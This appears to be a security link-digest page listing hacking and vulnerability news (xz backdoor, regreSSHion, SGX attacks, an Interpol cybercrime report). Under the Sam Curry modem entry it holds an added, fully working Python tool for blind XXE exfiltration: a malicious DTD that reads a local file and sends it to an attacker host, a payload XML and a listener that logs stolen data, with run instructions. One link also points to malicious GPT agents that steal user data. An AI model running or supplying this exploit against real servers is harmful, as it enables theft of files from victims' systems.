TechSploits
- regreSSHion: CVE-2024-6387
Update your openssh, now
- Hacking Millions of Modems (and Investigating Who Hacked My Modem) (samcurry.net)
Two years ago, something very strange happened to me while working from my home network. I was exploiting a blind XXE vulnerability that required an external HTTP server to smuggle out files, so I spun up an AWS box and ran a simple Python webserver to receive the traffic from the vulnerable server.
Unbelievable...
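The setup Sam Curry's post mentions in passing, blind XXE with out-of-band exfiltration through an attacker-controlled HTTP server, as an added example; this is not code from the post. It shows both halves: the external DTD that makes the victim's XML parser read a local file and request a URL containing its contents, and the listener that recovers the leaked data from that request. The listener hostname, port and target file are assumptions for illustration.

```python
"""Blind XXE with out-of-band (OOB) exfiltration, as described in the post:
the target's XML parser is tricked into fetching an attacker-hosted DTD and
then sending a local file's contents to the attacker's HTTP listener.
Added example, not Sam Curry's code; LISTENER, PORT and TARGET_FILE are
assumptions for illustration."""
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

LISTENER = "attacker.example"  # assumption: the externally reachable box
PORT = 8000
# assumption: a small single-line file; newlines or quotes in the file break
# the URL-based channel, which is the usual OOB XXE limitation
TARGET_FILE = "/etc/hostname"


def external_dtd(listener: str = LISTENER, port: int = PORT,
                 target: str = TARGET_FILE) -> str:
    """DTD served by the attacker. %file reads the target file; %eval declares
    a second parameter entity whose SYSTEM URL embeds %file;'s value, and
    %exfil; makes the parser fetch that URL. '&#x25;' is an escaped '%' so the
    inner declaration survives the first parse of the DTD."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target}">\n'
        '<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM '
        f"'http://{listener}:{port}/x?d=%file;'>\">\n"
        "%eval;\n"
        "%exfil;\n"
    )


def malicious_document(dtd_url: str) -> str:
    """XML sent to the vulnerable endpoint. It only references the remote
    DTD, so the response shows nothing: the leak happens on the side channel,
    which is what makes the XXE 'blind'."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE data [ <!ENTITY % remote SYSTEM "{dtd_url}"> %remote; ]>\n'
        "<data>ping</data>\n"
    )


def extract_exfil(request_path: str) -> Optional[str]:
    """Recover the leaked file contents from the path the parser requested,
    or None for any other request (e.g. the DTD fetch itself)."""
    query = parse_qs(urlparse(request_path).query)
    values = query.get("d")
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    """Listener: serves the DTD on /evil.dtd and logs the exfiltrated data."""

    def do_GET(self) -> None:
        if urlparse(self.path).path == "/evil.dtd":
            body = external_dtd().encode()
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
            return
        leaked = extract_exfil(self.path)
        if leaked is not None:
            print(f"[+] exfiltrated from {self.client_address[0]}: {leaked!r}")
        self.send_response(204)
        self.end_headers()


if __name__ == "__main__":
    # print the document to submit to the target, then wait for the callback
    print(malicious_document(f"http://{LISTENER}:{PORT}/evil.dtd"))
    HTTPServer(("0.0.0.0", PORT), ExfilHandler).serve_forever()
```

Run it on the externally reachable host, submit the printed document to the vulnerable endpoint, and the file contents show up in the listener's log. Because the data travels in a URL, only short, URL-safe content comes through cleanly; anything with newlines or quotes needs an encoding step on the victim side, which is why the post's author needed a real server rather than just watching DNS.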
- Writing a Unix clone in about a month
Drew always has a hot take about a problem
- Brane Dump: How I Tripped Over the Debian Weak Keys Vulnerability
Recent HN Thread: https://news.ycombinator.com/item?id=39976225
- The xz sshd backdoor rabbithole goes quite a bit deeper (threadreaderapp.com: Thread by @bl4sty on Thread Reader App)
@bl4sty: the xz sshd backdoor rabbithole goes quite a bit deeper. I was just able to trigger some harder to reach functionality of the backdoor. there's still more to explore.. 1/n it requires sending a properly craf...
The PoC thickens
- An IRC client in your motherboard (axleos.com)
I made a graphical IRC client that runs in UEFI. It's written in Rust and leverages the GUI toolkit and TrueType renderer that I wrote for axle's userspace. I was able to develop it thanks to the vmnet network backend that I implemented for QEMU. You can connect to an IRC server, chat and read messa...
UEFI IRC, the perfect companion to asking why your Linux boot partition no longer exists #joke
- xzbot: Notes, honeypot, and exploit demo for the xz backdoor (CVE-2024-3094) (github.com, amlweems/xzbot)
- Network tunneling with… QEMU? (securelist.com)
While investigating an incident, we detected uncommon malicious activity inside one of the systems. We ran an analysis on the artifacts, only to find that the adversary had deployed and launched the QEMU hardware emulator.
- Cracking Meta's Messenger Certificate Pinning on macOS (texts.blog)
Bypassing certificate pinning in Meta's Messenger application on macOS.
- World Server Throwing Championship (www.cloudfest.com)
The World Server Throwing Championship at CloudFest lets Cloud professionals demonstrate their raw power! Are you strong enough?
- Snake on a Switch [Video]
Video link for those on clients who don't show links when they are videos: https://i.imgur.com/5jtvxPQ.mp4
- Ramrecovery: Simple demo illustrating remanence of data in RAM (see Cold boot attack) using a Raspberry Pi (github.com, anfractuosity/ramrecovery)
Simple demo illustrating remanence of data in RAM (see Cold boot attack) using a Raspberry Pi. Loads many images of the Mona Lisa into RAM and recovers after powering off/on again.
Practical attacks with a Raspberry Pi.
- DEF CON 30 - Sam Bent - Tor - Darknet Opsec By a Veteran Darknet Vendor
An interesting talk
- How I forked SteamOS for my living room PC
linux_gaming@lemmy.ml
- Interesting double-poly latches inside AMD's vintage LANCE Ethernet chip (www.righto.com)
I've studied a lot of chips from the 1970s and 1980s, so I usually know what to expect. But an Ethernet chip from 1982 had something new: a ...
- Operation Triangulation: The last (hardware) mystery (securelist.com)
Recent iPhone models have additional hardware-based security protection for sensitive regions of the kernel memory. We discovered that to bypass this hardware-based security protection, the attackers used another hardware feature of Apple-designed SoCs.
Pretty scary stuff in here
- [37C3] There oughta be a Game Boy capture cartridge. (there.oughta.be)
I present to you: The GB Interceptor. It is an adapter that goes between an unmodified Game Boy and the cartridge and offers a video stream of the game via USB. Click the image to see the video on youtube.com. The video above should give you a good overview of what it does, how it works and what its...
> https://github.com/Staacks/gbinterceptor
- [37C3] Full AACSess: Exposing and exploiting AACSv2 UHD DRM for your viewing pleasure (PDF)
Abstract
Intel's Software Guard Extensions (SGX) promises an isolated execution environment, protected from all software running on the machine. As such, numerous works have sought to leverage SGX to provide confidentiality and integrity guarantees for code running in adversarial environments. In the past few years however, SGX has come under heavy fire, threatened by numerous hardware attacks. With Intel repeatedly patching SGX to regain security while consistently launching new (micro)architectures, it is increasingly difficult to track the applicability of various attacks techniques across the SGX design landscape. Thus, in this paper we set out to survey and categorize various SGX attacks, their applicability to different SGX architectures, as well as the information leaked by them. We then set out to explore the effectiveness of SGX's update mechanisms in preventing attacks on real-world deployments. Here, we study two commercial SGX applications. First, we investigate the SECRET network, an SGX-backed blockchain aiming to provide privacy preserving smart contracts. Next, we also consider PowerDVD, a UHD Blu-Ray Digital Rights Management (DRM) software licensed to play discs on PCs. We show that in both cases vendors are unable to meet security goals originally envisioned for their products, presumably due to SGX's long update timelines and the complexities of a manual update process. This in turn forces vendors into making difficult security/usability trade offs, resulting in security compromises.
-----
A worthwhile read for those who don't mind a more technical paper
- [37C3] Malicious ChatGPT Agents: How GPTs Can Quietly Grab Your Data (Demo) · Embrace The Red
Relevant Links:
- https://www.wsj.com/articles/with-ai-hackers-can-simply-talk-computers-into-misbehaving-ad488686
- https://www.wired.com/story/chatgpt-prompt-injection-attack-security/
- [37C3] Predator Files: Technical deep-dive into Intellexa Alliance's surveillance products - Amnesty International Security Lab (securitylab.amnesty.org)
An exposé of the Intellexa Alliance's surveillance capabilities, including advanced spyware, mass surveillance platforms, and tactical systems for targeting and intercepting nearby devices.
- Adventures in reverse engineering Broadcom NIC firmware
They are also doing a 37C3 talk on the matter: https://www.devever.net/~hl/ortega-37c3/ortega-37c3-web.pdf
- A data corruption bug in OpenZFS? (Writeup) (despairlabs.com)
The Thanksgiving long weekend (23-26 November) in 2023 was an interesting one for OpenZFS, that I managed to land myself in the middle of.
This is the write up of the OpenZFS bug. Very interesting and well explained.
- Nissan Australia cyberattack claimed by Akira ransomware gang (www.bleepingcomputer.com)
Today, the Akira ransomware gang claimed that it breached the network of Nissan Australia, the Australian division of Japanese car maker Nissan.
Could be worse. People could own a Nissan.
- Celebrating the first NES Tetris game crash (biggieblog.com, a blog by biggiemac42)
Blue Scuti made history, breaking NES Tetris in a way that was previously only theoretical. Here is a glimpse into the what, who, and how.
Today, the NES Tetris community achieved a new milestone. A player known as "Blue Scuti" reached level 157, a total of 1510 lines deep into the game, placed a piece, and his game crashed.
This post will describe why that is not only interesting, but a thing to be celebrated.
There will be topics in this post that assume you know everything from my previous post about Tetris. That post has no assumed prior knowledge, so start there and then come back if you want to know more.
- 3,500 arrested, $300M seized in global cybercrime crackdown (www.scmagazine.com)
Operation HAECHI IV, coordinated by Interpol, spanned 34 countries and led to more than 82,000 suspicious bank accounts being frozen.
5 - 6 mins (if you are a slow reader)
Police in 34 countries arrested 3500 people and seized assets worth $300 million in the latest iteration of what has become an annual coordinated global crackdown on cybercrime.
According to Interpol, Operation HAECHI IV ran from July to December and targeted seven types of scams: voice phishing, romance scams, online sextortion, investment fraud, money laundering associated with illegal online gambling, business email compromise fraud, and e-commerce fraud.
As a result of the operation, authorities blocked 82,112 suspicious bank accounts, seizing a total of $199 million in hard currency and a further $101 million worth of virtual assets.
Interpol's executive director of police services, Stephen Kavanagh, said the "staggering" sum seized was a clear illustration of the incentives that were driving an explosive growth in transnational organized crime.
"This represents the savings and hard-earned cash of victims," he said. "This vast accumulation of unlawful wealth is a serious threat to global security and weakens the economic stability of nations worldwide."
Interpol said Operation HAECHI IV involved investigators working together to detect online fraud and freeze associated bank and virtual asset service provider accounts using Interpol's Global Rapid Intervention of Payments (I-GRIP), a stop-payment mechanism which helps countries work together to block criminal proceeds.
Interpol helped frontline officers identify 367 virtual asset accounts linked to transnational organized crime. Assets in those accounts have been frozen as local police continue their investigations.
Dragnet pulls in more AI-powered crime
In one case resulting from the operation, Filipino and Korean authorities worked together to apprehend a "high-profile online gambling criminal" who was arrested in Manila after spending two years on the run from Korea's National Police Agency. The illegal gambling operation the man allegedly ran was dismantled.
Interpol published two "purple notices" (warnings about emerging digital investment fraud practices) during the operation.
One alerted police around the world to a new scam detected in Korea involving the sale of non-fungible tokens (NFTs) with promises of huge returns, which turned out to be a "rug pull" scam where the developers abruptly abandon a project and investors lose their money.
The second purple notice warned about the use of AI and deep fake technology to lend credibility to scams by enabling criminals to hide their identities and to pretend to be a family member, friend, or love interest of the person they are attempting to dupe.
"The UK leg of the operation reported several cases where AI-generated synthetic content was used to deceive, defraud, harass, and extort victims, particularly through impersonation scams, online sexual blackmail, and investment fraud," Interpol said.
"Cases also involved the impersonation of people known to the victims through voice cloning technology."
Investment fraud, business email compromise and e-commerce fraud accounted for 75 per cent of cases investigated during the operation.
Arrests and seizures keep growing
A similar operation last year, HAECHI III, netted almost 1000 arrests and $130 million in assets.
"HAECHI IV's 200 per cent surge in arrests shows the persistent challenge of cyber-enabled crime, reminding us to stay alert and keep refining our tactics against online fraud, which is why INTERPOL operations like this are so important," Kavanagh said.
The first operation in the series, HAECHI-I, involved police from nine countries in Asia working together between September 2020 and March 2021 to make 585 arrests and seize $83 million.
Interpol's head of National Central Bureau in Korea, Kim Dong Kwon, praised the international policing effort that led to the increased results achieved by HAECHI IV.
"Despite criminals' endeavors to gain illicit advantages through contemporary trends, they will eventually be apprehended and face due punishment. To accomplish this, Project HAECHI will consistently evolve and expand its scope."
As SentinelOne explained in a 2021 post about HAECHI-II: in Korea, Haechi is a popular mythical animal widely used as a symbol of justice. The countries participating in this year's operation were: Argentina, Australia, Brunei, Cambodia, Cayman Islands, Ghana, India, Indonesia, Ireland, Japan, Kyrgyzstan, Laos, Liechtenstein, Malaysia, Maldives, Mauritius, Nigeria, Pakistan, Philippines, Poland, Korea, Romania, Seychelles, Singapore, Slovenia, South Africa, Spain, Sweden, Thailand, United Arab Emirates, United Kingdom, United States and Vietnam. Hong Kong also participated.
- Beeper - Moving Forward (blog.beeper.com)
Each time that Beeper Mini goes "down" or is made to be unreliable due to interference by Apple, Beeper's credibility takes a hit. It's unsustainable. As much as we want to fight for what we believe is a fantastic product that really should exist, the truth is that we can't win a cat-and-mouse game ...
Who thought that when you integrate with Apple services as a third party you would be blocked?
- SMTP Smuggling - Spoofing E-Mails Worldwide (sec-consult.com)
Introducing a novel technique for e-mail spoofing
Watch out after the 27th to 29th of December, when everyone releases the tools/PoCs at 37C3.
- Unauthenticated keystroke injection from BT on Android, Linux, macOS/iOS*
Unpatched devices are vulnerable under the following conditions:
- Android devices are vulnerable whenever Bluetooth is enabled
- Linux/BlueZ requires that Bluetooth is discoverable/connectable
- iOS and macOS are vulnerable when Bluetooth is enabled and a Magic Keyboard has been paired with the phone or computer
----
Time to disable Bluetooth on all your old android phones!
- Dutch hacker jailed for extortion, selling stolen data on RaidForums (www.bleepingcomputer.com)
A former Dutch cybersecurity professional was sentenced to four years in prison after being found guilty of hacking and blackmailing more than a dozen companies in the Netherlands and worldwide.
- Exploiting DNS response parsing on the Wii U (garyodernichts.blogspot.com)
It's annual Wii U exploit time! After reverse engineering parts of the Wii U's ...
Is it DNS? It's always DNS!
PS. I'd recommend their other writeups too! Such as: https://garyodernichts.blogspot.com/2022/06/exploiting-wii-us-usb-descriptor-parsing.html?m=1
- Fixing the Volume on my Bluetooth Earbuds (blog.ornx.net)
A bit of reverse engineering goes a long way
Now this is some nice reverse engineering
- Oh-Auth - Abusing OAuth to take over millions of accounts (salt.security, Salt Labs)
It's extremely important to make sure your OAuth implementation is secure. The fix is just one line of code away. We sincerely hope the information shared in our blog post series will help prevent major online breaches and help web service owners better protect their customers and users.